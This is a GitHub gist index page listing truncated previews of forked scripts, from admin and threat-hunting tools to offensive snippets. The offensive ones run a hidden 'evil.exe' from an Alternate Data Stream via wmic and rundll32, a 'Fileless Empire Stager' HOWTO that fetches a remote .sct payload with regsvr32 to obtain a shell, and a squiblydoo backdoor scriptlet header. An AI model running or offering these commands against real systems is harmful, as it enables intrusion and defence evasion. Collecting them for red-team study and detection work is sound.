Skip to content

Instantly share code, notes, and snippets.

View jamesshew's full-sized avatar
💭
setting my status

jamesshew

💭
setting my status
12 followers · 19 following
View GitHub Profile
@jamesshew
jamesshew / doc2markdown.py
Created August 1, 2018 13:23 — forked from goerz/doc2markdown.py
Convert a word (doc/docx) file to markdown
#!/usr/bin/env python
"""Convert a word (doc/docx) file to markdown"""
import sys
import os
import subprocess
SOFFICE = r'/Applications/LibreOffice.app/Contents/MacOS/soffice'
PANDOC = r'pandoc'
@jamesshew
jamesshew / base64padding.ps1
Created June 7, 2018 12:03 — forked from obscuresec/base64padding.ps1
Base64 Padding in PowerShell
# define and encode test data
$TestString = 'This is a test. A short test for encoding and padding.'
$Encoded = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($TestString))
# insert random '='
$Length = $Encoded.Length
$RandomChar = 1..($Length - 3) | Get-Random
$Encoded = $Encoded.Insert($RandomChar,'=')
# strip out '='
@jamesshew
jamesshew / Exe_ADS_Methods.txt
Created January 18, 2018 16:37 — forked from api0cradle/Exe_ADS_Methods.md
Execute from Alternate Streams
#Add content to ADS
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
#Executing the ADS content
* WMIC
wmic process call create '"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"'
* Rundll32
@jamesshew
jamesshew / Get-VSANResyncStatus.ps1
Created January 17, 2018 22:05 — forked from rayterrill/Get-VSANResyncStatus.ps1
Get VSAN Resync Status using SSH
#requires https://github.com/darkoperator/Posh-SSH
function Get-VSANResyncStatus {
param(
[string]$esx_server,
[String]$esx_username,
[String]$esx_password
)
$secpasswd = ConvertTo-SecureString $esx_password -AsPlainText -Force
@jamesshew
jamesshew / GetVSANDiskStats.ps1
Created January 17, 2018 22:05 — forked from rayterrill/GetVSANDiskStats.ps1
Uses PowerCLI to try to mimic the RVC command vsan.disks_stats does.
<#PSScriptInfo
.VERSION 1.0
.GUID 4e9ee514-64cb-430d-afc9-fb0b24ca6c3b
.AUTHOR Ray Terrill
.COMPANYNAME Port of Portland
.DESCRIPTION This function tries to reconstruct what the RVC command "vsan.disks_stats ." does using PowerCLI. Shout out to @lamw for the idea.
#>
<#
.NOTES
===========================================================================
@jamesshew
jamesshew / Get-InjectedThread.ps1
Created November 17, 2017 23:36 — forked from jaredcatkinson/Get-InjectedThread.ps1
Code from "Taking Hunting to the Next Level: Hunting in Memory" presentation at SANS Threat Hunting Summit 2017 by Jared Atkinson and Joe Desimone
function Get-InjectedThread
{
<#
.SYNOPSIS
Looks for threads that were created as a result of code injection.
.DESCRIPTION
@jamesshew
jamesshew / New-Detour.ps1
Created October 12, 2016 19:27 — forked from adamdriscoll/New-Detour.ps1
Example of how to use EasyHook with powershell to override GetSystemTimeAsFileTime
function New-Detour
{
param(
$Library,
$FunctionName,
[ScriptBlock]$Detour,
[String[]]$ReferencedAssemblies
)
#Download from easyhook.codeplex.com
@jamesshew
jamesshew / HOWTO
Created May 2, 2016 16:59
Fileless Empire Stager
1. Create Empire Listener
2. Generate Stager
3. Host Stager Code At Some URL
4. Host .sct File At Some URL
5. On host, execute regsvr32.exe /i:http://server/empire.sct scrobj.dll
6. Instanitate the Object. ( ex: $s=New-Object -COM "Empire";$s.Exec() )
-Or This rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();s=new%20ActiveXObject("Empire");s.Exec();
7. Wait for Shell...
@jamesshew
jamesshew / Backdoor-Minimalist.sct
Created May 2, 2016 16:58
Execute Remote Scripts Via regsvr32.exe - Referred to As "squiblydoo" Please use this reference...
<?XML version="1.0"?>
<scriptlet>
<registration
progid="PoC"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Proof Of Concept - Casey Smith @subTee -->
<!-- License: BSD3-Clause -->
<script language="JScript">
<![CDATA[